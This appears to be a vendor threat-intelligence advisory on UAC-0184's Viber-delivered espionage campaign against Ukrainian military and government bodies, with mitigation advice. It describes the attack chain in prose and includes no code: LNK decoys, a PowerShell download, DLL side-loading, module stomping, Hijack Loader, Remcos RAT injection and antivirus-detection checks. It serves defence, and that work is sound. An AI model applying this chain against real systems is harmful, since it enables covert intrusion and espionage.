Executive Summary

A Russia-aligned threat actor, tracked as UAC-0184 (also known as Hive0156), has been observed orchestrating a sophisticated cyber-espionage campaign targeting Ukrainian military and government entities. This operation leverages the Viber messaging platform as a delivery channel for malicious payloads, marking a significant evolution in adversarial tactics away from traditional email-based phishing. The attackers distribute weaponized ZIP archives containing deceptive Windows shortcut files, which, when executed, initiate a multi-stage infection chain culminating in the deployment of advanced remote access malware. The primary objectives of this campaign are intelligence gathering, persistent access, and exfiltration of sensitive data from high-value Ukrainian targets.

Threat Actor Profile

UAC-0184 is a Russia-aligned advanced persistent threat (APT) group with a documented history of targeting Ukrainian governmental and military organizations. The group is known for its agility in adopting new delivery vectors, including messaging platforms such as Signal, Telegram, and now Viber, to bypass conventional email security controls. UAC-0184 specializes in spearphishing, leveraging war-themed lures and official-looking documents to entice victims. Their operations are characterized by the use of multi-stage loaders, advanced evasion techniques, and the deployment of commercial remote administration tools for command and control. The group’s motivation is primarily espionage, with a focus on extracting strategic and operational intelligence from Ukrainian institutions.

Technical Analysis of Malware/TTPs

The attack chain commences with the delivery of malicious ZIP archives via Viber messages. These archives, often named to mimic official Ukrainian parliamentary or military documents (e.g., A2393.zip), contain multiple Windows shortcut (LNK) files disguised as Microsoft Word, Excel, or RTF documents. Upon execution, the LNK files display a decoy document to the user, while simultaneously launching a PowerShell script in the background.

The PowerShell script downloads a secondary ZIP archive, typically named smoothieks.zip, from a remote server. This archive contains a legitimate executable, such as CFlux.exe, which is abused for DLL side-loading. The legitimate executable loads a malicious DLL that employs non-standard control flow and module stomping to evade endpoint detection and response (EDR) solutions. The DLL decrypts embedded data, reconstructs the Hijack Loader payload in memory, and injects shellcode into a newly spawned process.

Hijack Loader is a modular loader that further deploys Remcos RAT by injecting it into the legitimate Chime.exe process. Remcos RAT is a commercially available remote administration tool that, when abused, provides the attacker with full remote access, including keystroke logging, screen capture, file exfiltration, and command execution capabilities. The loader also performs environmental checks, such as scanning for the presence of security software (including Kaspersky, Avast, BitDefender, AVG, Emsisoft, Webroot, and Microsoft products) by calculating CRC32 hashes of installed program files, and adapts its behavior to evade detection.

Persistence is achieved through the creation of scheduled tasks, ensuring the malware survives system reboots. The use of DLL side-loading, module stomping, and in-memory payload reconstruction allows the threat actor to bypass static signature-based detection and complicate forensic analysis.

Exploitation in the Wild

This campaign has been observed actively targeting Ukrainian military and government departments, including the Verkhovna Rada (Ukrainian parliament). The attackers utilize Viber to deliver malicious ZIP attachments directly to targeted individuals, exploiting the trust and ubiquity of messaging platforms in official communications. The ZIP archives contain LNK files masquerading as legitimate documents, which, when executed, initiate the multi-stage infection process described above.

The exploitation chain is notable for its use of legitimate binaries for DLL side-loading and the deployment of Remcos RAT within a trusted process context, significantly increasing the difficulty of detection. The attackers employ decoy documents to reduce user suspicion and leverage advanced evasion techniques, such as module stomping and environmental awareness, to persist within compromised environments.

Victimology and Targeting

The primary victims of this campaign are Ukrainian military and government entities, with a particular focus on individuals involved in defense, intelligence, and legislative functions. The attackers craft lures that reference current events, military operations, and official government business to increase the likelihood of successful compromise. There is no evidence to suggest that the Viber application itself is vulnerable; rather, the platform is abused as a delivery vector for malicious content. Any organization or individual using Viber for official communications, especially those in high-risk sectors, is potentially at risk if proper security controls are not in place.

Mitigation and Countermeasures

Organizations should implement network-level controls to monitor and restrict the use of Viber and other messaging applications for file delivery, particularly on sensitive networks. Endpoint security solutions must be configured to detect and block the execution of LNK files and monitor for suspicious PowerShell activity, especially scripts that download and execute remote ZIP archives. Security teams should monitor for the creation or execution of CFlux.exe and Chime.exe outside of their legitimate contexts, as these are commonly abused for DLL side-loading and malware injection.

It is critical to update endpoint protection platforms to recognize behaviors associated with Hijack Loader and Remcos RAT, including in-memory payload reconstruction, DLL side-loading, and module stomping. User awareness training should emphasize the risks of opening unexpected ZIP attachments, even when received via trusted messaging platforms. Regular reviews of scheduled tasks and startup items can help identify and remediate persistence mechanisms established by the malware.

Incident response teams should collect and analyze forensic artifacts related to PowerShell execution, scheduled task creation, and process injection events. Network defenders are encouraged to implement application whitelisting and restrict the execution of unsigned or untrusted binaries. Where possible, organizations should consider disabling the ability to receive file attachments via Viber on endpoints handling sensitive information.

References

• The Hacker News: Russia-Aligned Hackers Abuse Viber to Target Ukrainian Military and Government

• Security Affairs: Russia-linked APT UAC-0184 uses Viber to spy on Ukrainian military in 2025

• 360 Advanced Threat Research Institute

• CERT-UA advisories (January 2024)

• MITRE ATT&CK Techniques

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their extended supply chain. Our advanced threat intelligence and risk analytics empower security teams to proactively defend against emerging threats and ensure the resilience of critical business operations. For more information or to discuss how Rescana can support your organization’s cybersecurity strategy, we are happy to answer questions at ops@rescana.com.